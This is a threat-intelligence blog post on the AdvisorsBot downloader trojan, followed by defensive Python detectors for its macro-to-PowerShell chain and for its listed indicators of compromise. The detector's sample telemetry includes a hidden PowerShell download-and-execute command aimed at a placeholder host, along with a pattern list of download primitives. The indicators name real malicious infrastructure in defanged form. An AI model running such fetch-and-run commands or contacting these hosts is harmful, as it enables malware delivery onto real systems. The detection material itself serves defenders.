AdvisorsBot Downloader

Proofpoint researchers have identified a new downloader trojan, written in C and named AdvisorsBot, in campaigns targeting governmental, telecommunications and leisure organisations.

AdvisorsBot is being distributed through large-scale spam campaigns that use several different lure documents. The documents carry malicious macros which, once the recipient enables them, run a PowerShell command that downloads and installs AdvisorsBot.
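
The delivery chain above (Office document, macro, PowerShell stager, download) leaves a recognisable parent/child trace in process-creation telemetry. The following is an added example of how a defender could flag that chain; it is not code from the original report or from the campaign, and the sample events, the list of Office parents and script hosts, and the command-line markers are assumptions made for the demonstration (the events imitate the shape of Sysmon Event ID 1 records, and example.invalid is a placeholder host).

```python
"""Flag the Office-macro -> PowerShell download chain in process-creation telemetry.

Added example: the sample events are constructed to resemble Sysmon Event ID 1 /
EDR process-creation records. They are not from the AdvisorsBot campaign, and the
marker list is an assumption about what a PowerShell stager typically contains.
"""
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# Substrings a macro-launched PowerShell stager commonly carries: a download
# primitive, an encoded command, or a request for a hidden window.
DOWNLOAD_MARKERS = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
    r"start-bitstransfer|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden",
    re.IGNORECASE,
)


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return (score, reasons) for one process-creation event.

    Score 1: an Office application spawned a script host (macro execution).
    Score 2: ...and the PowerShell command line also looks like a downloader.
    """
    reasons = []
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        reasons.append(f"{parent} spawned {child}")
    if child in {"powershell.exe", "pwsh.exe"} and DOWNLOAD_MARKERS.search(cmd):
        reasons.append("download/encoded/hidden marker in PowerShell command line")
    return len(reasons), reasons


def find_suspicious(events, min_score=1):
    """Return [(EventId, reasons)] for events scoring at least min_score."""
    hits = []
    for event in events:
        score, reasons = classify(event)
        if score >= min_score:
            hits.append((event["EventId"], reasons))
    return hits


# Constructed sample telemetry (not real data).
SAMPLE_EVENTS = [
    {"EventId": 1,
     "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -nop -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/stage')\""},
    {"EventId": 2,
     "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"EventId": 3,
     "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE",
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c echo hi"},
    {"EventId": 4,
     "ParentImage": "C:\\Windows\\System32\\services.exe",
     "Image": "C:\\Windows\\System32\\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for event_id, reasons in find_suspicious(SAMPLE_EVENTS):
        print(event_id, "; ".join(reasons))
```

Event 1 scores 2 (Word spawned PowerShell with a download primitive), event 3 scores 1 (Excel spawned cmd.exe, which deserves a look but is not by itself a downloader), and the two benign events score 0. In practice the score-1 tier is noisy in environments with legitimate macro automation, so the parent/child rule is usually combined with the command-line markers or with a network event from the same process before paging anyone.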

Once installed, AdvisorsBot shares much of its functionality with the Marap downloader: it fingerprints the victim, collecting user and system information, before connecting to a command and control server.

An alternative version of AdvisorsBot, known as PoshAdvisor, also exists. Rewritten in PowerShell and .NET, it provides the same functionality as the C version.

Like most modern malware, AdvisorsBot employs a number of anti-analysis features. One of the most effective is the use of junk code, such as extra instructions, conditional statements and loops, which does not change the malware's behaviour but considerably slows down reverse engineering by inflating the amount of code an analyst has to read.

Read a full report on this here

Indicators Of Compromise

IP Addresses

  • 162.244.32[.]148
  • 185.180.198[.]56

URLs and Domains

  • 162.244.32[.]185/jquery.js
  • 204.155.31[.]167/bootstrap.css
  • chklink[.]us/upd.bin
  • finance-advisors-ca[.]bid/ldr.bin
  • interactive-investments[.]bid
  • investments-advisors[.]bid
  • real-estate-advisors[.]win
  • secur-real-estate[.]bid

SHA256 File Hashes

  • 1eb1ef64a9b41267e362597e071e181acb86b50e708ede4a9448689da7fb2425
  • 2a27d7ad1f16c90767e1cf98c92905aa5a3030a268c8206462c5215a87d0e132
  • 335229e528c6348a3dc5941c434dc67acb031f297d9ac25e53a2a56d3df3e255
  • 34a2fc4eb718a8b13a44cfb851ccac6cf63e54fe7e7ab145a5bdeb6def2d4620
  • 6d73bea291bf6114af8333031187ac05fdfc8afe05025b272f510a6977b2153e
  • 956eae6395ed5e1b2d49ffa08ff85b42d1fc210531ab9c48c2d76e6ee38c9781
  • 9dd12d3a32d2ba133bac8747f872f649b389a9cf3f4baaa9fad69a43d2e4f982
  • c659b00a65a574a08fff64662581a8ecae7eafa38850a6c7c19b88c2085a1c03
  • ee32c4e0a4b345029d8b0f5c6534fa9fc41e795cc937d3f3fd743dcb0a1cea35
  • fdf5072b904ba9148d8b98e4ba01987e644449e2b10f033ca4d2f967dc502a58
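
The indicators above are only useful once they are matched against telemetry. The following is an added example (not from the original report) that refangs the listed IPs, URLs, domains and SHA256 hashes and runs them over a proxy log and a file-hash inventory. Only the indicators come from the page; the proxy log format, the log lines, the client addresses and the file inventory are constructed for the demonstration.

```python
"""Match the AdvisorsBot indicators listed above against proxy logs and file hashes.

Added example, not from the original report. Only the indicators come from the
page; the log format, the log lines and the file inventory below are constructed
for the demonstration.
"""
import re
from urllib.parse import urlsplit

IOC_IPS = ["162.244.32[.]148", "185.180.198[.]56"]
IOC_URLS = [
    "162.244.32.185/jquery[.]js",
    "204.155.31.167/bootstrap[.]css",
    "chklink.us/upd[.]bin",
    "finance-advisors-ca.bid/ldr[.]bin",
    "interactive-investments[.]bid",
    "investments-advisors[.]bid",
    "real-estate-advisors[.]win",
    "secur-real-estate[.]bid",
]
IOC_SHA256 = {
    "1eb1ef64a9b41267e362597e071e181acb86b50e708ede4a9448689da7fb2425",
    "2a27d7ad1f16c90767e1cf98c92905aa5a3030a268c8206462c5215a87d0e132",
    "335229e528c6348a3dc5941c434dc67acb031f297d9ac25e53a2a56d3df3e255",
    "34a2fc4eb718a8b13a44cfb851ccac6cf63e54fe7e7ab145a5bdeb6def2d4620",
    "6d73bea291bf6114af8333031187ac05fdfc8afe05025b272f510a6977b2153e",
    "956eae6395ed5e1b2d49ffa08ff85b42d1fc210531ab9c48c2d76e6ee38c9781",
    "9dd12d3a32d2ba133bac8747f872f649b389a9cf3f4baaa9fad69a43d2e4f982",
    "c659b00a65a574a08fff64662581a8ecae7eafa38850a6c7c19b88c2085a1c03",
    "ee32c4e0a4b345029d8b0f5c6534fa9fc41e795cc937d3f3fd743dcb0a1cea35",
    "fdf5072b904ba9148d8b98e4ba01987e644449e2b10f033ca4d2f967dc502a58",
}


def refang(indicator):
    """Turn a defanged indicator ("[.]", "hxxp") back into a matchable string."""
    return indicator.replace("[.]", ".").replace("hxxp", "http").lower()


def build_tables():
    """Split indicators into exact hosts, exact (host, path) pairs, and hosts that
    only appear as part of a URL indicator (a weaker signal on their own)."""
    hosts, host_paths, url_hosts = set(), set(), set()
    for ip in IOC_IPS:
        hosts.add(refang(ip))
    for ioc in IOC_URLS:
        host, _, path = refang(ioc).partition("/")
        if path:
            host_paths.add((host, "/" + path))
            url_hosts.add(host)
        else:
            hosts.add(host)
    return hosts, host_paths, url_hosts


EXACT_HOSTS, EXACT_HOST_PATHS, URL_HOSTS = build_tables()

# Constructed proxy log format: "<timestamp> <client-ip> <method> <url> <status>"
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")


def check_proxy_line(line):
    """Return (client, matched indicator, match kind) or None for one log line."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None  # unparseable line; count these separately in real use
    _ts, client, _method, url, _status = m.groups()
    parts = urlsplit(url if "://" in url else "http://" + url)
    host = (parts.hostname or "").lower()
    if host in EXACT_HOSTS:
        return (client, host, "host/IP indicator")
    if (host, parts.path) in EXACT_HOST_PATHS:
        return (client, host + parts.path, "URL indicator")
    if host in URL_HOSTS:
        return (client, host, "host of a URL indicator (weaker match)")
    return None


def scan_proxy_log(lines):
    return [hit for hit in map(check_proxy_line, lines) if hit is not None]


def scan_hashes(inventory):
    """inventory: iterable of (path, sha256 hex). Returns the matching entries."""
    return [(path, digest) for path, digest in inventory if digest.lower() in IOC_SHA256]


# Constructed sample data (made-up clients, timestamps and paths; not real logs).
LOG_LINES = [
    "2018-08-23T10:01:02Z 10.0.0.15 GET http://finance-advisors-ca.bid/ldr.bin 200",
    "2018-08-23T10:01:05Z 10.0.0.15 GET http://www.example.com/index.html 200",
    "2018-08-23T10:02:11Z 10.0.0.22 POST http://185.180.198.56/ 200",
    "2018-08-23T10:03:40Z 10.0.0.31 GET http://162.244.32.185/index.html 404",
    "garbage line",
]
FILE_INVENTORY = [
    ("C:\\Users\\alice\\AppData\\Local\\Temp\\sample.bin",
     "1eb1ef64a9b41267e362597e071e181acb86b50e708ede4a9448689da7fb2425"),
    ("C:\\Windows\\System32\\notepad.exe", "0" * 64),
]

if __name__ == "__main__":
    for hit in scan_proxy_log(LOG_LINES):
        print("network:", hit)
    for hit in scan_hashes(FILE_INVENTORY):
        print("file:", hit)
```

The three match tiers matter when triaging: a full URL match or a hit on one of the listed IPs is strong, whereas a request to the bare host of a URL indicator (the 162.244.32.185 example above, which fetched a different path) is weaker, since shared hosting and CDN addresses are often reused by unrelated sites. Hash matching is exact by nature, so a miss there says nothing about a recompiled sample; the network indicators and the process-chain detection are the more durable signals.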

Duncan Newell

Duncan is a technology professional with over 20 years' experience of working in various IT roles. He has an interest in cyber security, and has a wide range of other skills in radio, electronics and telecommunications.